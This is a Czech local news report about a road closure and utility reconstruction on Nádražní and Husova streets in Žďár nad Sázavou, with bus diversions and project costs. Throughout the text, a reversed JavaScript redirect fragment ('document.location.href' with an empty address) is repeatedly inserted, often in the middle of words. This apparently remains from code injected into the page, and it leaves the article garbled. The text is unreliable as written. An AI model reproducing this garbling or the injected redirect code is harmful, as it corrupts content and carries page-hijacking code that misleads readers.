Rainbow page separator

Uzavírka Nádražní ulice potrvá nejdéle do 20. prosince

Čtvrtek, 5. prosince 2019

Žďár nad Sázavou / Do nejpozději 20. prosince byla prodloužena úplná uzavírka částí ulic Husova a Nádražní v úseku od pošty ke kruhové křižovatce pod nádražím kvůli stavebním pracím na rekonstrukci inženýrských sítí. Z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho vyplývají také až do odvolání trvající změny ve vedení au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusových linek MHD čísel 3 a 6. Ty i nadále jezdí po ulici Strojírenská, přičemž zrušeny jsou pro ně zastávky Nádražní a Dagmarky. Jako náhrada jsou obsluhovány zastávky Strojírenská, u Hajčmanů a Strojírenská, u mostu.

Přes zimu budou opravované části komunikace provizorně zprovozněny, aby se tudy dalo jezdit, což se týká i provozu au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusů městské hromadné dopravy, a provádět zimní údržba. Na jaře v ulici Nádražní začne druhá část stavebních činností, která zahrne nové povrchy silnice i chodníků, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně osvětlení a veřejné zeleně. Kompletně zrekonstruována má být inkriminovaná část ulice na konci června.
Na první etapu přestavby za 21,1 milionu korun, z čehož přibližně 6,5 milionu uhradí Svaz vodovodů a kanalizací Žďársko a zbytek měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, naváže další etapa, kdy projde revitalizací pěší zóna od křižovatky u pošty po náměstí Republiky. Její nová podoba vychází z vítězného návrhu architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonické soutěže, kterou před časem měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to uspořádalo.